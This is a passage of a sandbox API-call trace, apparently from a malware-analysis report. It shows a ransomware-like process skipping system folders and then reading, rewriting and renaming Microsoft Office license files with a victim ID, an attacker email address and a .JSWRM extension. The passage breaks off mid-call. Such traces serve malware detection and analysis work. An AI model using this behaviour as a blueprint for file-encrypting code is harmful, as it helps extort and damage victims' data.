(lpString1="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0102.980] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0102.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0102.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0102.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0102.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0102.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0102.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0102.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0102.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0102.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0102.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.981] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19966) returned 1 [0102.981] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0102.981] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0103.180] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.180] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0103.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.180] CloseHandle (hObject=0x45c) returned 1 [0103.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0103.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0103.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0103.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0103.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0103.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0103.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.183] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0103.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0103.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0103.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.187] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3e393c5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3e393c5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3ef7f7a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29ab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp3-pl.xrm-ms", cAlternateFileName="HO5093~1.XRM")) returned 1 [0103.189] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-pl.xrm-ms", lpString2=".") returned 1 [0103.189] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-pl.xrm-ms", lpString2="..") returned 1 [0103.190] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-pl.xrm-ms", lpString2="...") returned 1 [0103.190] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-pl.xrm-ms", lpString2="windows") returned -1 [0103.190] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-pl.xrm-ms", lpString2="recovery") returned -1 [0103.190] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.190] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.190] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.190] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.190] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-pl.xrm-ms", lpString2="msocache") returned -1 [0103.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0103.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0103.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0103.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0103.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0103.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0103.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0103.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0103.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0103.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0103.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0103.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.196] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10667) returned 1 [0103.196] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24c1d0 [0103.196] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29a0, lpOverlapped=0x0) returned 1 [0103.204] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.204] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29a0, lpOverlapped=0x0) returned 1 [0103.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.204] CloseHandle (hObject=0x45c) returned 1 [0103.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0103.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0103.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0103.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0103.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0103.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0103.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.205] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0103.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0103.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0103.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.232] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3d2e398, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3d2e398, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3e393c5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x564e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", cAlternateFileName="HO0707~1.XRM")) returned 1 [0103.232] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", lpString2=".") returned 1 [0103.232] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", lpString2="..") returned 1 [0103.232] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", lpString2="...") returned 1 [0103.232] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", lpString2="windows") returned -1 [0103.232] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.232] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.232] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.232] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.232] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.232] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0103.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0103.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0103.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0103.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0103.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0103.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0103.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0103.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0103.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0103.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0103.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.233] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22094) returned 1 [0103.233] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5640) returned 0x24c1d0 [0103.233] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5640, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5640, lpOverlapped=0x0) returned 1 [0103.236] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.236] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5640, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5640, lpOverlapped=0x0) returned 1 [0103.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.237] CloseHandle (hObject=0x45c) returned 1 [0103.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0103.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0103.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0103.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0103.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0103.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0103.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0103.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0103.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.237] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0103.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0103.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0103.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.239] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: 